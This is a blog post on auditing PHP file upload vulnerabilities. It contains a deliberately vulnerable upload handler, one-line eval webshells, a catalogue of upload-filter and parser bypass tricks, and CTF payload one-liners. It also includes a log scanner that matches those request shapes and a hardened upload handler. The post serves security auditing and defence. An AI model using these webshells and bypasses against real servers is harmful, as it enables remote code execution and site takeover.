2020/1/30 PHP code audit: file upload vulnerabilities

0x00 Vulnerability overview

A file upload vulnerability lets a user upload an executable script file and, through that script, gain the ability to run commands on the server. This kind of attack is the most direct and effective one. "File upload" itself is not the problem; the problem is how the server handles and interprets the file once it has been uploaded. If the server's processing logic is not secure enough, the consequences are severe.

0x01 Conditions for the vulnerability

The file can be uploaded
The upload path of the file is known
The uploaded file can be accessed
The uploaded file can be executed

0x02 Discovery approach

All upload points usually call the same class, so search the whole code base directly for the upload function;
alternatively, find the upload points black-box style and then locate the corresponding code.

0x03 Writing an upload

Let's write a front-end upload page

<html>
<head>
<meta charset="UTF-8">
<title>upload.html</title>
</head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" name="上传文件">
    <!--<input type="hidden" name="MAX_FILE_SIZE" value="4098"> sets the upload size limit; normally this is configured in php.ini instead-->
</form>
</body>
</html>

Write the PHP upload handler

<?php
$upload_dir = "D:\PHPSTUDY2018\PHPTutorial\WWW\upload";
if(isset($_FILES['file'])){
    // $_FILES['file'] is an array; the original filename is in ['name']
    $upload_name = $upload_dir . "\\" . $_FILES['file']['name'];
    // No extension, type or content check at all: this is the vulnerable version
    move_uploaded_file($_FILES['file']['tmp_name'],$upload_name);
    echo "Type:" . $_FILES['file']['type']. "<br >";
    echo "Size:" . ($_FILES['file']['size'] / 1024) . "<br >";
    echo "Name:" . $_FILES['file']['name'];// these three lines just show the upload result
}else{
    echo "上传失败";
}

Write a one-line webshell

<?php
@eval($_POST['777']);
?>

Upload it:

Confirm that the upload succeeded.

Then connect with AntSword and you are in.
This is the simplest possible example; use it to start shifting your thinking toward white-box auditing, and build up gradually.

0x04 Bypassing file upload checks

1: Bypassing client-side JavaScript checks

Detection principle

The client checks via JavaScript code whether the file submitted by the user is legitimate.

Bypass methods

1. Add the file type to the allowed list, so that the type you want to upload counts as legitimate.

2. Remove the call to the JS validation script so it can no longer check the uploaded file's type: inspect the element and look at the form's markup; the form's start tag contains onsubmit="return checkFile()", which means clicking the upload button triggers the JS validation script. Deleting or changing that attribute bypasses the check.

3. Capture the request with Burp Suite and change the file type: first rename the suffix of the script you want to upload to an allowed type, e.g. webshell.php -> webshell.jpg; then, when clicking upload, intercept with Burp and change the suffix back to .php so that the server parses the uploaded file correctly.

2: Server-side bypasses

1: Bypassing MIME type detection

Detection principle
When a user uploads a file, the server-side program obtains the MIME type of the uploaded file and matches it against the expected MIME types; if there is no match, the file is considered illegitimate. Server-side MIME detection code looks like this:

if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')){
 ...// further processing of the file after the check
}

Bypass method

Because the server checks the file's MIME type, and that value is taken from the Content-Type field of the HTTP request, the bypass is simply to modify the Content-Type value, e.g. to image/jpeg, image/png, image/gif, or whichever MIME value corresponds to an allowed type.
2: Blacklist bypass

Detection principle

Blacklist-based file type detection works as follows: the server program uses a list of file extensions to decide whether the current file may be uploaded; if the uploaded file's type matches a type in the blacklist, the upload is refused.

Bypass methods

1. Filename case: use names like AsP or pHp to get past the blacklist check.
2. Gaps in the list: attack with an extension the blacklist does not contain, e.g. asa or cer.
3. Special filenames: e.g. change the filename in the HTTP request to test.asp. or test.asp_ (the underscore stands for a space). Windows does not allow such names, so the change has to be made in Burp or similar; once it passes validation, Windows automatically strips the trailing dot or space. Note that Unix/Linux does not have this behaviour.
4. 0x00 truncation: test.php(0x00).jpg or test.php%00.jpg
5. .htaccess file attack
6. Parser invocation / parsing vulnerability bypass
7. .ini file attack
8. File header bypass: prepend some file header information to the trojan content, giving a structure roughly like GIF89a<?php phpinfo(); ?>
9. Multiple Content-Disposition headers

Under IIS, if the upload request contains several Content-Disposition headers, IIS takes the value from the first one as the received parameter; if the WAF only reads the last one, it is bypassed. (Win2k8 + IIS7.0 + PHP)

10. Directory validation

IIS 6.0 has writable directories.

3: Web application parser bypasses

1. Apache parsing vulnerability
Parsed as: test.php.(any name that is neither on the blacklist nor in Apache's parsing whitelist), e.g. test.php.lala
Description: for a file named test.x1.x2.x3, Apache starts trying to parse from x3; if x3 is not an extension Apache can handle, it tries x2, and so on until it reaches one it can handle, otherwise it reports an error.

2. IIS parsing vulnerability
Parsed as: test.asp/(any filename) | test.asp;(any filename) | (any filename)/(any filename).php

Description: IIS 6.0 has two parsing vulnerabilities for asp. One: if a directory name contains the string ".asp", every file in that directory is parsed as asp. The other: if a filename contains ".asp;", it is parsed as asp with priority.

IIS 7.0/7.5 have a parsing vulnerability for php similar to Nginx's: for any file, appending the string "/anyname.php" to the URL causes it to be parsed as php.

3. Nginx parsing vulnerability
Parsed as: (any filename)/(any filename).php | (any filename)%00.php

Description: Nginx currently has mainly these two vulnerabilities. One: for any file, appending /anyname.php causes it to be parsed; e.g. a file originally named test.jpg can be requested as test.jpg/x.php for a parsing attack.
The other: in older Nginx versions, %00.php can be appended to any filename for a parsing attack.
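The request shapes listed for Apache, IIS and Nginx above are easy to spot in access logs. As an added example that is not part of the original post, here is a small PHP scanner that flags those shapes; the log lines are constructed for the demonstration and the function names are my own.

```php
<?php
// Added example: flag requests shaped like the parser tricks described above.
// Constructed sample data; not real traffic.

/** Return the name of the first matching pattern, or null if the path looks clean. */
function classifyUploadPath(string $path): ?string {
    $path = rawurldecode($path);               // make %00 and %2e visible to the regexes
    $patterns = [
        'nginx/iis7: path info after a static file' => '#\.(jpe?g|png|gif|txt)/[^/]*\.php$#i',
        'iis6: ";" inside the file name'            => '#\.(asp|aspx|php);#i',
        'iis6: ".asp" in a directory name'          => '#/[^/]*\.asp/#i',
        'null-byte truncation'                      => '#\x00#',
        'apache: .php followed by unknown extension' => '#\.php\.[a-z0-9]+$#i',
    ];
    foreach ($patterns as $label => $re) {
        if (preg_match($re, $path)) { return $label; }
    }
    return null;
}

/** Scan combined-format log lines; return [line number => label] for hits only. */
function scanAccessLog(array $lines): array {
    $hits = [];
    foreach ($lines as $i => $line) {
        // Request field: "METHOD /path HTTP/x.y" between the first pair of quotes.
        if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[\d.]+"/', $line, $m)) { continue; }
        $path = parse_url($m[1], PHP_URL_PATH) ?: $m[1];   // drop the query string
        if (($label = classifyUploadPath($path)) !== null) { $hits[$i + 1] = $label; }
    }
    return $hits;
}

// Constructed sample log (not real traffic).
$log = [
    '10.0.0.5 - - [30/Jan/2020:10:00:01 +0800] "GET /upload/avatar.jpg HTTP/1.1" 200 5120',
    '10.0.0.5 - - [30/Jan/2020:10:00:02 +0800] "GET /upload/avatar.jpg/x.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [30/Jan/2020:10:00:03 +0800] "GET /upload/test.asp;1.jpg HTTP/1.1" 200 88',
    '10.0.0.9 - - [30/Jan/2020:10:00:04 +0800] "GET /upload/test.php.lala HTTP/1.1" 200 88',
    '10.0.0.9 - - [30/Jan/2020:10:00:05 +0800] "GET /upload/test.jpg%00.php HTTP/1.1" 200 88',
];
foreach (scanAccessLog($log) as $n => $label) {
    echo "line $n: $label\n";   // line 1 is clean; lines 2 to 5 are each reported
}
```

A 200 status on such a request is the signal worth alerting on; a 404 means the web server already refused the shape.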

0x05 One-liners I often use in CTFs

1: I once ran into an arbitrary file upload vulnerability where config.php did not define the type Media; request: upload/.php?Type=Media
2: Upload an image trojan
3: Serialized trojan:

<?php
class A{
    var $a = "<?php phpinfo()?>";
}
$aa = new A();
echo serialize($aa);
?>

4: php, php3, php4, php5, phtml, pht
5: Extension bypasses
Asp: asa cer cdx
Aspx: ashx asmx ascx
Php: php3 phtml
Jsp: jspx jspf
6:

<script language=php>system("ls")</script>

7:

GIF89a?
<script language="php">eval($_REQUEST[shell])</script>

0x06 Defence

Server-side whitelist validation of the file extension.
Server-side validation of the file content.
Rename uploaded files.
Hide the path of uploaded files.
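The defences listed above, as an added example that is not part of the original post: a hardened rewrite of the naive upload.php from 0x03. It applies the 0x06 list and also closes the Content-Type and blacklist bypasses from 0x04; the storage directory, size limit and JSON response are assumptions.

```php
<?php
// Added example: hardened upload handler. $upload_dir is an assumed path OUTSIDE
// the web root, so nothing stored here can be executed by the web server.
$upload_dir = '/var/app/uploads';
$allowed    = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
$max_bytes  = 2 * 1024 * 1024;   // assumed limit

function reject(string $why): void { http_response_code(400); exit('Upload rejected: ' . $why); }

if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) { reject('no file'); }
$f = $_FILES['file'];
if (!is_uploaded_file($f['tmp_name'])) { reject('not an uploaded file'); }
if ($f['size'] > $max_bytes) { reject('too large'); }

// Whitelist the extension instead of blacklisting. strtolower defeats pHp-style
// case tricks; the null-byte and trailing dot/space checks cover 0x00 and "test.asp."
$name = $f['name'];
if (strpos($name, "\0") !== false || preg_match('/[. ]$/', $name)) { reject('bad name'); }
$ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
if (!isset($allowed[$ext])) { reject('extension not allowed'); }

// Never trust $_FILES['file']['type']: it is just the client's Content-Type header.
// Inspect the bytes of the temp file instead, and cross-check with getimagesize().
$finfo = new finfo(FILEINFO_MIME_TYPE);
$real  = $finfo->file($f['tmp_name']);
if ($real !== $allowed[$ext]) { reject('content does not match extension'); }
if (@getimagesize($f['tmp_name']) === false) { reject('not a valid image'); }

// Rename: the stored name is random and unrelated to user input, so the upload
// path is not guessable and a double extension (x.php.jpg) cannot survive.
$stored = bin2hex(random_bytes(16)) . '.' . $ext;
$dest   = $upload_dir . DIRECTORY_SEPARATOR . $stored;
if (!move_uploaded_file($f['tmp_name'], $dest)) { reject('could not store file'); }
chmod($dest, 0644);

// Return an opaque id; a separate read-only handler serves the bytes with a fixed
// Content-Type, so the stored file is never interpreted by the web server.
echo json_encode(['id' => $stored]);
```

A polyglot such as the GIF89a<?php ... ?> trick from 0x04 still passes the finfo and getimagesize checks, which is why storing the file outside the web root and serving it through a handler that never executes it is the step that actually matters; re-encoding images with GD would strip embedded code as well.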

Reference: https://www.cnblogs.com/ldhbetter/p/9190556.html

Origin www.cnblogs.com/wangtanzhi/p/12243206.html